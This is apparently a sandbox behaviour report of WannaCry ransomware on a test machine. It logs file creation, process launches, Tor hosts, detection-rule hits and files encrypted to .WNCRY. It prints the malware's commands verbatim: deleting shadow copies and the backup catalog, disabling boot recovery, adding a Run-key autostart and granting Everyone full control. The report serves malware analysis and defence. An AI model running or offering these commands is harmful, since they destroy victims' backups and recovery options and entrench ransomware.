filepath_r: \??\C:\MSOCache\All Users\{90120000-00A1-0412-0000-0000000FF1CE}-C\~SDFB16.tmp
create_options: 96 (FILE_NON_DIRECTORY_FILE|FILE_SYNCHRONOUS_IO_NONALERT)
status_info: 3 (FILE_OVERWRITTEN)
share_access: 0 ()
1 0 0

NtCreateFile

 create_disposition: 5 (FILE_OVERWRITE_IF)
file_handle: 0x0000014c
filepath: C:\MSOCache\All Users\{90120000-0114-0412-0000-0000000FF1CE}-C\~SDFB26.tmp
desired_access: 0x40100080 (FILE_READ_ATTRIBUTES|SYNCHRONIZE|GENERIC_WRITE)
file_attributes: 2 (FILE_ATTRIBUTE_HIDDEN)
filepath_r: \??\C:\MSOCache\All Users\{90120000-0114-0412-0000-0000000FF1CE}-C\~SDFB26.tmp
create_options: 96 (FILE_NON_DIRECTORY_FILE|FILE_SYNCHRONOUS_IO_NONALERT)
status_info: 3 (FILE_OVERWRITTEN)
share_access: 0 ()
1 0 0

NtCreateFile

 create_disposition: 5 (FILE_OVERWRITE_IF)
file_handle: 0x0000014c
filepath: C:\MSOCache\All Users\{90120000-0114-0412-0000-0000000FF1CE}-C\Groove.en-us\~SDFB27.tmp
desired_access: 0x40100080 (FILE_READ_ATTRIBUTES|SYNCHRONIZE|GENERIC_WRITE)
file_attributes: 2 (FILE_ATTRIBUTE_HIDDEN)
filepath_r: \??\C:\MSOCache\All Users\{90120000-0114-0412-0000-0000000FF1CE}-C\Groove.en-us\~SDFB27.tmp
create_options: 96 (FILE_NON_DIRECTORY_FILE|FILE_SYNCHRONOUS_IO_NONALERT)
status_info: 3 (FILE_OVERWRITTEN)
share_access: 0 ()
1 0 0

NtCreateFile

 create_disposition: 5 (FILE_OVERWRITE_IF)
file_handle: 0x0000014c
filepath: C:\MSOCache\All Users\{90120000-0114-0412-0000-0000000FF1CE}-C\Office.en-us\~SDFB28.tmp
desired_access: 0x40100080 (FILE_READ_ATTRIBUTES|SYNCHRONIZE|GENERIC_WRITE)
file_attributes: 2 (FILE_ATTRIBUTE_HIDDEN)
filepath_r: \??\C:\MSOCache\All Users\{90120000-0114-0412-0000-0000000FF1CE}-C\Office.en-us\~SDFB28.tmp
create_options: 96 (FILE_NON_DIRECTORY_FILE|FILE_SYNCHRONOUS_IO_NONALERT)
status_info: 3 (FILE_OVERWRITTEN)
share_access: 0 ()
1 0 0

NtCreateFile

 create_disposition: 5 (FILE_OVERWRITE_IF)
file_handle: 0x0000014c
filepath: C:\MSOCache\All Users\{90120000-0114-0412-0000-0000000FF1CE}-C\Office64.en-us\~SDFB29.tmp
desired_access: 0x40100080 (FILE_READ_ATTRIBUTES|SYNCHRONIZE|GENERIC_WRITE)
file_attributes: 2 (FILE_ATTRIBUTE_HIDDEN)
filepath_r: \??\C:\MSOCache\All Users\{90120000-0114-0412-0000-0000000FF1CE}-C\Office64.en-us\~SDFB29.tmp
create_options: 96 (FILE_NON_DIRECTORY_FILE|FILE_SYNCHRONOUS_IO_NONALERT)
status_info: 3 (FILE_OVERWRITTEN)
share_access: 0 ()
1 0 0

NtCreateFile

 create_disposition: 5 (FILE_OVERWRITE_IF)
file_handle: 0x0000014c
filepath: C:\PerfLogs\~SDFB2A.tmp
desired_access: 0x40100080 (FILE_READ_ATTRIBUTES|SYNCHRONIZE|GENERIC_WRITE)
file_attributes: 2 (FILE_ATTRIBUTE_HIDDEN)
filepath_r: \??\C:\PerfLogs\~SDFB2A.tmp
create_options: 96 (FILE_NON_DIRECTORY_FILE|FILE_SYNCHRONOUS_IO_NONALERT)
status_info: 3 (FILE_OVERWRITTEN)
share_access: 0 ()
1 0 0

NtCreateFile

 create_disposition: 5 (FILE_OVERWRITE_IF)
file_handle: 0x0000014c
filepath: C:\PerfLogs\Admin\~SDFB2B.tmp
desired_access: 0x40100080 (FILE_READ_ATTRIBUTES|SYNCHRONIZE|GENERIC_WRITE)
file_attributes: 2 (FILE_ATTRIBUTE_HIDDEN)
filepath_r: \??\C:\PerfLogs\Admin\~SDFB2B.tmp
create_options: 96 (FILE_NON_DIRECTORY_FILE|FILE_SYNCHRONOUS_IO_NONALERT)
status_info: 3 (FILE_OVERWRITTEN)
share_access: 0 ()
1 0 0

NtCreateFile

 create_disposition: 5 (FILE_OVERWRITE_IF)
file_handle: 0x0000014c
filepath: C:\Python27\~SDFB3C.tmp
desired_access: 0x40100080 (FILE_READ_ATTRIBUTES|SYNCHRONIZE|GENERIC_WRITE)
file_attributes: 2 (FILE_ATTRIBUTE_HIDDEN)
filepath_r: \??\C:\Python27\~SDFB3C.tmp
create_options: 96 (FILE_NON_DIRECTORY_FILE|FILE_SYNCHRONOUS_IO_NONALERT)
status_info: 3 (FILE_OVERWRITTEN)
share_access: 0 ()
1 0 0

NtCreateFile

 create_disposition: 5 (FILE_OVERWRITE_IF)
file_handle: 0x00000150
filepath: C:\Python27\click\~SDFB5C.tmp
desired_access: 0x40100080 (FILE_READ_ATTRIBUTES|SYNCHRONIZE|GENERIC_WRITE)
file_attributes: 2 (FILE_ATTRIBUTE_HIDDEN)
filepath_r: \??\C:\Python27\click\~SDFB5C.tmp
create_options: 96 (FILE_NON_DIRECTORY_FILE|FILE_SYNCHRONOUS_IO_NONALERT)
status_info: 3 (FILE_OVERWRITTEN)
share_access: 0 ()
1 0 0

NtCreateFile

 create_disposition: 5 (FILE_OVERWRITE_IF)
file_handle: 0x00000150
filepath: C:\Python27\click\click\~SDFB5D.tmp
desired_access: 0x40100080 (FILE_READ_ATTRIBUTES|SYNCHRONIZE|GENERIC_WRITE)
file_attributes: 2 (FILE_ATTRIBUTE_HIDDEN)
filepath_r: \??\C:\Python27\click\click\~SDFB5D.tmp
create_options: 96 (FILE_NON_DIRECTORY_FILE|FILE_SYNCHRONOUS_IO_NONALERT)
status_info: 3 (FILE_OVERWRITTEN)
share_access: 0 ()
1 0 0

NtCreateFile

 create_disposition: 5 (FILE_OVERWRITE_IF)
file_handle: 0x00000150
filepath: C:\Python27\click\click\click_image\~SDFB5E.tmp
desired_access: 0x40100080 (FILE_READ_ATTRIBUTES|SYNCHRONIZE|GENERIC_WRITE)
file_attributes: 2 (FILE_ATTRIBUTE_HIDDEN)
filepath_r: \??\C:\Python27\click\click\click_image\~SDFB5E.tmp
create_options: 96 (FILE_NON_DIRECTORY_FILE|FILE_SYNCHRONOUS_IO_NONALERT)
status_info: 3 (FILE_OVERWRITTEN)
share_access: 0 ()
1 0 0

NtCreateFile

 create_disposition: 5 (FILE_OVERWRITE_IF)
file_handle: 0x0000014c
filepath: C:\Python27\click\click_image\~SDFB5F.tmp
desired_access: 0x40100080 (FILE_READ_ATTRIBUTES|SYNCHRONIZE|GENERIC_WRITE)
file_attributes: 2 (FILE_ATTRIBUTE_HIDDEN)
filepath_r: \??\C:\Python27\click\click_image\~SDFB5F.tmp
create_options: 96 (FILE_NON_DIRECTORY_FILE|FILE_SYNCHRONOUS_IO_NONALERT)
status_info: 3 (FILE_OVERWRITTEN)
share_access: 0 ()
1 0 0

NtCreateFile

 create_disposition: 5 (FILE_OVERWRITE_IF)
file_handle: 0x0000014c
filepath: C:\Python27\DLLs\~SDFB60.tmp
desired_access: 0x40100080 (FILE_READ_ATTRIBUTES|SYNCHRONIZE|GENERIC_WRITE)
file_attributes: 2 (FILE_ATTRIBUTE_HIDDEN)
filepath_r: \??\C:\Python27\DLLs\~SDFB60.tmp
create_options: 96 (FILE_NON_DIRECTORY_FILE|FILE_SYNCHRONOUS_IO_NONALERT)
status_info: 3 (FILE_OVERWRITTEN)
share_access: 0 ()
1 0 0

NtCreateFile

 create_disposition: 5 (FILE_OVERWRITE_IF)
file_handle: 0x0000014c
filepath: C:\Python27\Doc\~SDFB61.tmp
desired_access: 0x40100080 (FILE_READ_ATTRIBUTES|SYNCHRONIZE|GENERIC_WRITE)
file_attributes: 2 (FILE_ATTRIBUTE_HIDDEN)
filepath_r: \??\C:\Python27\Doc\~SDFB61.tmp
create_options: 96 (FILE_NON_DIRECTORY_FILE|FILE_SYNCHRONOUS_IO_NONALERT)
status_info: 3 (FILE_OVERWRITTEN)
share_access: 0 ()
1 0 0

NtCreateFile

 create_disposition: 5 (FILE_OVERWRITE_IF)
file_handle: 0x0000014c
filepath: C:\Python27\include\~SDFB72.tmp
desired_access: 0x40100080 (FILE_READ_ATTRIBUTES|SYNCHRONIZE|GENERIC_WRITE)
file_attributes: 2 (FILE_ATTRIBUTE_HIDDEN)
filepath_r: \??\C:\Python27\include\~SDFB72.tmp
create_options: 96 (FILE_NON_DIRECTORY_FILE|FILE_SYNCHRONOUS_IO_NONALERT)
status_info: 3 (FILE_OVERWRITTEN)
share_access: 0 ()
1 0 0

NtCreateFile

 create_disposition: 5 (FILE_OVERWRITE_IF)
file_handle: 0x0000014c
filepath: C:\Python27\Lib\~SDFB73.tmp
desired_access: 0x40100080 (FILE_READ_ATTRIBUTES|SYNCHRONIZE|GENERIC_WRITE)
file_attributes: 2 (FILE_ATTRIBUTE_HIDDEN)
filepath_r: \??\C:\Python27\Lib\~SDFB73.tmp
create_options: 96 (FILE_NON_DIRECTORY_FILE|FILE_SYNCHRONOUS_IO_NONALERT)
status_info: 3 (FILE_OVERWRITTEN)
share_access: 0 ()
1 0 0

NtCreateFile

 create_disposition: 5 (FILE_OVERWRITE_IF)
file_handle: 0x0000014c
filepath: C:\Python27\Lib\bsddb\~SDFB74.tmp
desired_access: 0x40100080 (FILE_READ_ATTRIBUTES|SYNCHRONIZE|GENERIC_WRITE)
file_attributes: 2 (FILE_ATTRIBUTE_HIDDEN)
filepath_r: \??\C:\Python27\Lib\bsddb\~SDFB74.tmp
create_options: 96 (FILE_NON_DIRECTORY_FILE|FILE_SYNCHRONOUS_IO_NONALERT)
status_info: 3 (FILE_OVERWRITTEN)
share_access: 0 ()
1 0 0

NtCreateFile

 create_disposition: 5 (FILE_OVERWRITE_IF)
file_handle: 0x0000014c
filepath: C:\Python27\Lib\bsddb\test\~SDFB84.tmp
desired_access: 0x40100080 (FILE_READ_ATTRIBUTES|SYNCHRONIZE|GENERIC_WRITE)
file_attributes: 2 (FILE_ATTRIBUTE_HIDDEN)
filepath_r: \??\C:\Python27\Lib\bsddb\test\~SDFB84.tmp
create_options: 96 (FILE_NON_DIRECTORY_FILE|FILE_SYNCHRONOUS_IO_NONALERT)
status_info: 3 (FILE_OVERWRITTEN)
share_access: 0 ()
1 0 0

NtCreateFile

 create_disposition: 5 (FILE_OVERWRITE_IF)
file_handle: 0x0000014c
filepath: C:\Python27\Lib\compiler\~SDFB85.tmp
desired_access: 0x40100080 (FILE_READ_ATTRIBUTES|SYNCHRONIZE|GENERIC_WRITE)
file_attributes: 2 (FILE_ATTRIBUTE_HIDDEN)
filepath_r: \??\C:\Python27\Lib\compiler\~SDFB85.tmp
create_options: 96 (FILE_NON_DIRECTORY_FILE|FILE_SYNCHRONOUS_IO_NONALERT)
status_info: 3 (FILE_OVERWRITTEN)
share_access: 0 ()
1 0 0

NtCreateFile

 create_disposition: 5 (FILE_OVERWRITE_IF)
file_handle: 0x0000014c
filepath: C:\Python27\Lib\ctypes\~SDFB86.tmp
desired_access: 0x40100080 (FILE_READ_ATTRIBUTES|SYNCHRONIZE|GENERIC_WRITE)
file_attributes: 2 (FILE_ATTRIBUTE_HIDDEN)
filepath_r: \??\C:\Python27\Lib\ctypes\~SDFB86.tmp
create_options: 96 (FILE_NON_DIRECTORY_FILE|FILE_SYNCHRONOUS_IO_NONALERT)
status_info: 3 (FILE_OVERWRITTEN)
share_access: 0 ()
1 0 0

NtCreateFile

 create_disposition: 5 (FILE_OVERWRITE_IF)
file_handle: 0x0000014c
filepath: C:\Python27\Lib\ctypes\macholib\~SDFB87.tmp
desired_access: 0x40100080 (FILE_READ_ATTRIBUTES|SYNCHRONIZE|GENERIC_WRITE)
file_attributes: 2 (FILE_ATTRIBUTE_HIDDEN)
filepath_r: \??\C:\Python27\Lib\ctypes\macholib\~SDFB87.tmp
create_options: 96 (FILE_NON_DIRECTORY_FILE|FILE_SYNCHRONOUS_IO_NONALERT)
status_info: 3 (FILE_OVERWRITTEN)
share_access: 0 ()
1 0 0

NtCreateFile

 create_disposition: 5 (FILE_OVERWRITE_IF)
file_handle: 0x0000014c
filepath: C:\Python27\Lib\ctypes\test\~SDFB98.tmp
desired_access: 0x40100080 (FILE_READ_ATTRIBUTES|SYNCHRONIZE|GENERIC_WRITE)
file_attributes: 2 (FILE_ATTRIBUTE_HIDDEN)
filepath_r: \??\C:\Python27\Lib\ctypes\test\~SDFB98.tmp
create_options: 96 (FILE_NON_DIRECTORY_FILE|FILE_SYNCHRONOUS_IO_NONALERT)
status_info: 3 (FILE_OVERWRITTEN)
share_access: 0 ()
1 0 0
file C:\Users\test22\AppData\Local\Temp\@WanaDecryptor@.exe.lnk
cmdline wmic shadowcopy delete
cmdline cmd.exe /c reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v "dhattnjpato996" /t REG_SZ /d "\"C:\Users\test22\AppData\Local\Temp\tasksche.exe\"" /f
cmdline cmd.exe /c start /b @WanaDecryptor@.exe vs
cmdline cmd.exe /c vssadmin delete shadows /all /quiet & wmic shadowcopy delete & bcdedit /set {default} bootstatuspolicy ignoreallfailures & bcdedit /set {default} recoveryenabled no & wbadmin delete catalog -quiet
file C:\Users\test22\AppData\Local\Temp\TaskData\Tor\zlib1.dll
file C:\Users\test22\AppData\Local\Temp\taskdl.exe
file C:\Users\test22\AppData\Local\Temp\TaskData\Tor\libssp-0.dll
file C:\Users\test22\AppData\Local\Temp\taskse.exe
file C:\Users\test22\AppData\Local\Temp\TaskData\Tor\ssleay32.dll
file C:\Users\test22\AppData\Local\Temp\TaskData\Tor\libeay32.dll
file C:\Users\test22\AppData\Local\Temp\TaskData\Tor\libevent_extra-2-0-5.dll
file C:\Users\test22\AppData\Local\Temp\TaskData\Tor\libevent_core-2-0-5.dll
file C:\Users\test22\AppData\Local\Temp\TaskData\Tor\libgcc_s_sjlj-1.dll
file C:\Users\test22\AppData\Local\Temp\TaskData\Tor\tor.exe
file C:\Users\test22\AppData\Local\Temp\u.wnry
file C:\Users\test22\AppData\Local\Temp\TaskData\Tor\libevent-2-0-5.dll
wmi SELECT * FROM Win32_ShadowCopy
Time & API Arguments Status Return Repeated

CreateProcessInternalW

 thread_identifier: 2720
thread_handle: 0x00000064
process_identifier: 2716
current_directory:
filepath:
track: 1
command_line: attrib +h .
filepath_r:
stack_pivoted: 0
creation_flags: 134217728 (CREATE_NO_WINDOW)
inherit_handles: 0
process_handle: 0x00000068
1 1 0

CreateProcessInternalW

 thread_identifier: 2764
thread_handle: 0x00000064
process_identifier: 2760
current_directory:
filepath:
track: 1
command_line: icacls . /grant Everyone:F /T /C /Q
filepath_r:
stack_pivoted: 0
creation_flags: 134217728 (CREATE_NO_WINDOW)
inherit_handles: 0
process_handle: 0x00000068
1 1 0

CreateProcessInternalW

 thread_identifier: 2876
thread_handle: 0x00000110
process_identifier: 2872
current_directory:
filepath:
track: 1
command_line: taskdl.exe
filepath_r:
stack_pivoted: 0
creation_flags: 134217728 (CREATE_NO_WINDOW)
inherit_handles: 0
process_handle: 0x00000114
1 1 0

CreateProcessInternalW

 thread_identifier: 0
thread_handle: 0x00000000
process_identifier: 0
current_directory:
filepath:
track: 0
command_line: @WanaDecryptor@.exe fi
filepath_r:
stack_pivoted: 0
creation_flags: 134217728 (CREATE_NO_WINDOW)
inherit_handles: 0
process_handle: 0x00000000
0 0

CreateProcessInternalW

 thread_identifier: 2928
thread_handle: 0x0000011c
process_identifier: 2924
current_directory:
filepath:
track: 1
command_line: 36401687182996.bat
filepath_r:
stack_pivoted: 0
creation_flags: 134217728 (CREATE_NO_WINDOW)
inherit_handles: 0
process_handle: 0x00000114
1 1 0

CreateProcessInternalW

 thread_identifier: 196
thread_handle: 0x00000154
process_identifier: 152
current_directory:
filepath:
track: 1
command_line: @WanaDecryptor@.exe co
filepath_r:
stack_pivoted: 0
creation_flags: 134217728 (CREATE_NO_WINDOW)
inherit_handles: 0
process_handle: 0x00000164
1 1 0

CreateProcessInternalW

 thread_identifier: 2196
thread_handle: 0x00000154
process_identifier: 2192
current_directory:
filepath:
track: 1
command_line: cmd.exe /c start /b @WanaDecryptor@.exe vs
filepath_r:
stack_pivoted: 0
creation_flags: 134217728 (CREATE_NO_WINDOW)
inherit_handles: 0
process_handle: 0x00000164
1 1 0

CreateProcessInternalW

 thread_identifier: 744
thread_handle: 0x00000170
process_identifier: 800
current_directory:
filepath:
track: 1
command_line: taskse.exe C:\Users\test22\AppData\Local\Temp\@WanaDecryptor@.exe
filepath_r:
stack_pivoted: 0
creation_flags: 134217728 (CREATE_NO_WINDOW)
inherit_handles: 0
process_handle: 0x000000dc
1 1 0

CreateProcessInternalW

 thread_identifier: 1560
thread_handle: 0x000000dc
process_identifier: 1504
current_directory:
filepath:
track: 1
command_line: cmd.exe /c reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v "dhattnjpato996" /t REG_SZ /d "\"C:\Users\test22\AppData\Local\Temp\tasksche.exe\"" /f
filepath_r:
stack_pivoted: 0
creation_flags: 134217728 (CREATE_NO_WINDOW)
inherit_handles: 0
process_handle: 0x00000170
1 1 0

CreateProcessInternalW

 thread_identifier: 1520
thread_handle: 0x00000178
process_identifier: 884
current_directory:
filepath:
track: 1
command_line: taskdl.exe
filepath_r:
stack_pivoted: 0
creation_flags: 134217728 (CREATE_NO_WINDOW)
inherit_handles: 0
process_handle: 0x00000174
1 1 0

CreateProcessInternalW

 thread_identifier: 2788
thread_handle: 0x00000174
process_identifier: 2780
current_directory:
filepath:
track: 1
command_line: taskse.exe C:\Users\test22\AppData\Local\Temp\@WanaDecryptor@.exe
filepath_r:
stack_pivoted: 0
creation_flags: 134217728 (CREATE_NO_WINDOW)
inherit_handles: 0
process_handle: 0x00000178
1 1 0

CreateProcessInternalW

 thread_identifier: 940
thread_handle: 0x000000dc
process_identifier: 1080
current_directory:
filepath:
track: 1
command_line: taskdl.exe
filepath_r:
stack_pivoted: 0
creation_flags: 134217728 (CREATE_NO_WINDOW)
inherit_handles: 0
process_handle: 0x00000174
1 1 0

CreateProcessInternalW

 thread_identifier: 2524
thread_handle: 0x00000174
process_identifier: 1736
current_directory:
filepath:
track: 1
command_line: taskse.exe C:\Users\test22\AppData\Local\Temp\@WanaDecryptor@.exe
filepath_r:
stack_pivoted: 0
creation_flags: 134217728 (CREATE_NO_WINDOW)
inherit_handles: 0
process_handle: 0x000000dc
1 1 0

CreateProcessInternalW

 thread_identifier: 2828
thread_handle: 0x00000164
process_identifier: 2748
current_directory:
filepath:
track: 1
command_line: taskdl.exe
filepath_r:
stack_pivoted: 0
creation_flags: 134217728 (CREATE_NO_WINDOW)
inherit_handles: 0
process_handle: 0x00000160
1 1 0

CreateProcessInternalW

 thread_identifier: 2532
thread_handle: 0x00000160
process_identifier: 2124
current_directory:
filepath:
track: 1
command_line: taskse.exe C:\Users\test22\AppData\Local\Temp\@WanaDecryptor@.exe
filepath_r:
stack_pivoted: 0
creation_flags: 134217728 (CREATE_NO_WINDOW)
inherit_handles: 0
process_handle: 0x00000164
1 1 0

CreateProcessInternalW

 thread_identifier: 2600
thread_handle: 0x00000124
process_identifier: 2592
current_directory:
filepath:
track: 1
command_line: TaskData\Tor\taskhsvc.exe
filepath_r:
stack_pivoted: 0
creation_flags: 134217728 (CREATE_NO_WINDOW)
inherit_handles: 0
process_handle: 0x00000114
1 1 0

CreateProcessInternalW

 thread_identifier: 2748
thread_handle: 0x00000114
process_identifier: 2728
current_directory:
filepath:
track: 1
command_line: cmd.exe /c vssadmin delete shadows /all /quiet & wmic shadowcopy delete & bcdedit /set {default} bootstatuspolicy ignoreallfailures & bcdedit /set {default} recoveryenabled no & wbadmin delete catalog -quiet
filepath_r:
stack_pivoted: 0
creation_flags: 134217728 (CREATE_NO_WINDOW)
inherit_handles: 0
process_handle: 0x00000110
1 1 0
Time & API Arguments Status Return Repeated

Process32NextW

 snapshot_handle: 0x0000009c
process_name: pw.exe
process_identifier: 2328
1 1 0

Process32NextW

 snapshot_handle: 0x0000009c
process_name: taskhost.exe
process_identifier: 2452
1 1 0

Process32NextW

 snapshot_handle: 0x0000009c
process_name: WannaCry.exe
process_identifier: 2632
1 1 0

Process32NextW

 snapshot_handle: 0x0000009c
process_name: @WanaDecryptor@.exe
process_identifier: 152
1 1 0

Process32NextW

 snapshot_handle: 0x0000009c
process_name: @WanaDecryptor@.exe
process_identifier: 2264
1 1 0

Process32NextW

 snapshot_handle: 0x0000009c
process_name: dllhost.exe
process_identifier: 2488
1 1 0

Process32NextW

 snapshot_handle: 0x0000009c
process_name: taskhsvc.exe
process_identifier: 2592
1 1 0

Process32NextW

 snapshot_handle: 0x0000009c
process_name: conhost.exe
process_identifier: 2612
1 1 0

Process32NextW

 snapshot_handle: 0x0000009c
process_name:
process_identifier: 128
0 0

Process32NextW

 snapshot_handle: 0x000001ec
process_name:
process_identifier: 2047
0 0
Time & API Arguments Status Return Repeated

NtProtectVirtualMemory

 process_identifier: 2632
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
length: 24576
protection: 32 (PAGE_EXECUTE_READ)
base_address: 0x10001000
process_handle: 0xffffffff
1 0 0
Time & API Arguments Status Return Repeated

GetAdaptersAddresses

 flags: 14
family: 2
1 0 0
section {u'size_of_data': u'0x0034a000', u'virtual_address': u'0x00010000', u'entropy': 7.999867975099674, u'name': u'.rsrc', u'virtual_size': u'0x00349fa0'} entropy 7.9998679751 description A section with a high entropy has been found
entropy 0.982497082847 description Overall entropy of this PE file is high
Time & API Arguments Status Return Repeated

LookupPrivilegeValueW

 system_name:
privilege_name: SeBackupPrivilege
1 1 0

LookupPrivilegeValueW

 system_name:
privilege_name: SeTcbPrivilege
1 1 0

LookupPrivilegeValueW

 system_name:
privilege_name: SeTcbPrivilege
1 1 0

LookupPrivilegeValueW

 system_name:
privilege_name: SeTcbPrivilege
1 1 0

LookupPrivilegeValueW

 system_name:
privilege_name: SeTcbPrivilege
1 1 0

LookupPrivilegeValueW

 system_name:
privilege_name: SeTcbPrivilege
1 1 0

LookupPrivilegeValueW

 system_name:
privilege_name: SeTcbPrivilege
1 1 0

LookupPrivilegeValueW

 system_name:
privilege_name: SeTcbPrivilege
1 1 0

LookupPrivilegeValueW

 system_name:
privilege_name: SeTcbPrivilege
1 1 0
url http://www.microsoft.com/schemas/ie8tldlistdescription/1.0
url http://purl.org/rss/1.0/
url https://en.wikipedia.org/wiki/Bitcoin
url http://www.btcfrog.com/qr/bitcoinPNG.php?address=%s
url http://www.passport.com
url https://www.google.com/search?q=how
description Create a windows service rule Create_Service
description Communication using DGA rule Network_DGA
description Communications over RAW Socket rule Network_TCP_Socket
description Communications use DNS rule Network_DNS
description Perform crypto currency mining rule BitCoin
description Steal credential rule local_credential_Steal
description Hijack network configuration rule Hijack_Network
description Code injection with CreateRemoteThread in a remote process rule Code_injection
description Communications over HTTP rule Network_HTTP
description PWS Memory rule Generic_PWS_Memory_Zero
description Record Audio rule Sniff_Audio
description Match Windows Http API call rule Str_Win32_Http_API
description Virtual currency rule Virtual_currency_Zero
description Match Windows Inet API call rule Str_Win32_Internet_API
description Take ScreenShot rule ScreenShot
description Escalate priviledges rule Escalate_priviledges
description Communications over P2P network rule Network_P2P_Win
description (no description) rule DebuggerCheck__GlobalFlags
description (no description) rule DebuggerCheck__QueryInfo
description (no description) rule DebuggerCheck__RemoteAPI
description (no description) rule DebuggerHiding__Thread
description (no description) rule DebuggerHiding__Active
description (no description) rule DebuggerException__ConsoleCtrl
description (no description) rule DebuggerException__SetConsoleCtrl
description (no description) rule ThreadControl__Context
description (no description) rule SEH__vectored
description (no description) rule Check_Dlls
description Checks if being debugged rule anti_dbg
description Anti-Sandbox checks for ThreatExpert rule antisb_threatExpert
description Bypass DEP rule disable_dep
description Affect hook table rule win_hook
description Install itself for autorun at Windows startup rule Persistence
description Communications over FTP rule Network_FTP
description Run a KeyLogger rule KeyLogger
description File Downloader rule Network_Downloader
cmdline wmic shadowcopy delete
cmdline cmd.exe /c reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v "dhattnjpato996" /t REG_SZ /d "\"C:\Users\test22\AppData\Local\Temp\tasksche.exe\"" /f
cmdline attrib +h .
cmdline reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v "dhattnjpato996" /t REG_SZ /d "\"C:\Users\test22\AppData\Local\Temp\tasksche.exe\"" /f
cmdline cmd.exe /c vssadmin delete shadows /all /quiet & wmic shadowcopy delete & bcdedit /set {default} bootstatuspolicy ignoreallfailures & bcdedit /set {default} recoveryenabled no & wbadmin delete catalog -quiet
host 163.172.13.165
host 171.25.193.9
host 193.11.164.243
host 81.7.10.93
host 89.147.109.179
file C:\Users\All Users\Microsoft\Microsoft Antimalware\~SD4D0.tmp
file C:\Users\All Users\Microsoft\Microsoft Antimalware\Network Inspection System
file C:\Users\All Users\Microsoft\Microsoft Antimalware\Network Inspection System\Support
file C:\Users\All Users\Microsoft\Microsoft Antimalware\Network Inspection System\Support\NisLog.txt.WNCRYT
file C:\Users\All Users\Microsoft\Microsoft Antimalware\Network Inspection System\Support\NisLog.txt
file C:\Users\All Users\Microsoft\Microsoft Antimalware\Network Inspection System\Support\NisLog.txt.WNCRY
file C:\Users\All Users\Microsoft\Microsoft Antimalware
file C:\Users\All Users\Microsoft\Microsoft Antimalware\Network Inspection System\~SD4D1.tmp
file C:\Users\All Users\Microsoft\Microsoft Antimalware\Network Inspection System\Support\~SD4D2.tmp
file C:\Users\test22\AppData\Local\Temp\SandboxieInstall.exe
file C:\Users\All Users\Microsoft\Microsoft Security Client\Support
file C:\Users\All Users\Microsoft\Microsoft Security Client
file C:\Users\All Users\Microsoft\Microsoft Security Client\~SD4E3.tmp
file C:\Users\All Users\Microsoft\Microsoft Security Client\Support\~SD4E4.tmp
reg_key HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run\dhattnjpato996 reg_value "C:\Users\test22\AppData\Local\Temp\tasksche.exe"
command cmd.exe /c vssadmin delete shadows /all /quiet & wmic shadowcopy delete & bcdedit /set {default} bootstatuspolicy ignoreallfailures & bcdedit /set {default} recoveryenabled no & wbadmin delete catalog -quiet
file C:\Users\test22\AppData\Local\Temp\121.WNCRYT
file C:\Python27\tcl\tcl8.5\msgs\pt_br.msg.WNCRY
file C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Extensions\pkedcjkdefgpdelpbcmbmeomcjbeemfm\7619.603.0.2_0\cast_setup\cast_app.js.WNCRYT
file C:\Users\test22\Documents\axTZwDBeUngqBG.ppt.WNCRYT
file C:\Python27\include\floatobject.h.WNCRY
file C:\Users\test22\AppData\Roaming\Mozilla\Firefox\Profiles\qxo5wa6x.default-release\pkcs11.txt.WNCRY
file C:\Python27\Lib\site-packages\pyperclip-1.8.0-py2.7.egg-info\top_level.txt.WNCRYT
file C:\Python27\tcl\tk8.5\demos\images\tcllogo.gif.WNCRY
file C:\Users\All Users\Microsoft\User Account Pictures\Default Pictures\usertile39.bmp.WNCRYT
file C:\Users\test22\Documents\UvxreHDTdz.docm.WNCRYT
file C:\Sandbox\test22\DefaultBox\user\current\AppData\Local\Google\Chrome\User Data\Default\Service Worker\CacheStorage\b1152479bea6c46553d8c242ffa5edf2b0a050a7\index.txt.WNCRYT
file C:\Users\test22\AppData\Local\Microsoft\Windows Mail\Stationery\Monet.jpg.WNCRYT
file C:\Users\test22\AppData\Local\Temp\657.WNCRYT
file C:\Users\test22\AppData\Local\Temp\630.WNCRYT
file C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Extensions\pkedcjkdefgpdelpbcmbmeomcjbeemfm\7619.603.0.2_0\cast_setup\chromecast_logo_grey.png.WNCRY
file C:\Python27\Lib\email\test\data\msg_23.txt.WNCRYT
file C:\Users\test22\AppData\Local\Temp\316.WNCRYT
file C:\Users\All Users\Microsoft\Windows NT\MSFax\VirtualInbox\ko-KR\WelcomeFax.tif.WNCRYT
file C:\Users\test22\AppData\Local\Temp\152.WNCRYT
file C:\Python27\include\token.h.WNCRY
file C:\Python27\include\dictobject.h.WNCRYT
file C:\Users\test22\AppData\Local\Microsoft\Windows\Explorer\thumbcache_32.db.WNCRY
file C:\Python27\Lib\site-packages\pip-19.2.3.dist-info\LICENSE.txt.WNCRYT
file C:\Python27\Lib\test\cjkencodings\iso2022_jp-utf8.txt.WNCRYT
file C:\Python27\tcl\tcl8.5\msgs\bn_in.msg.WNCRY
file C:\Python27\Lib\email\test\data\msg_31.txt.WNCRYT
file C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Extensions\pjkljhegncpnkpknbcohdijeoejaedia\8.3_0\128.png.WNCRY
file C:\Python27\include\pygetopt.h.WNCRY
file C:\Python27\click\click\click_image\exit1.png.WNCRYT
file C:\Python27\tcl\tcl8.5\msgs\he.msg.WNCRYT
file C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Extensions\aohghmighlieiainnegkcijnfilokake\0.10_0\icon_16.png.WNCRYT
file C:\Users\test22\AppData\Local\Temp\358.WNCRYT
file C:\Users\test22\AppData\Local\Temp\269.WNCRYT
file C:\Users\test22\AppData\Local\Temp\688.WNCRYT
file C:\Sandbox\test22\DefaultBox\user\current\AppData\Local\Google\Chrome\User Data\chrome_shutdown_ms.txt.WNCRY
file C:\Python27\tcl\tcl8.5\msgs\fr.msg.WNCRY
file C:\Python27\Lib\test\imghdrdata\python.png.WNCRY
file C:\Python27\tcl\tcl8.5\msgs\fa_ir.msg.WNCRYT
file C:\Users\test22\AppData\Local\Temp\615.WNCRYT
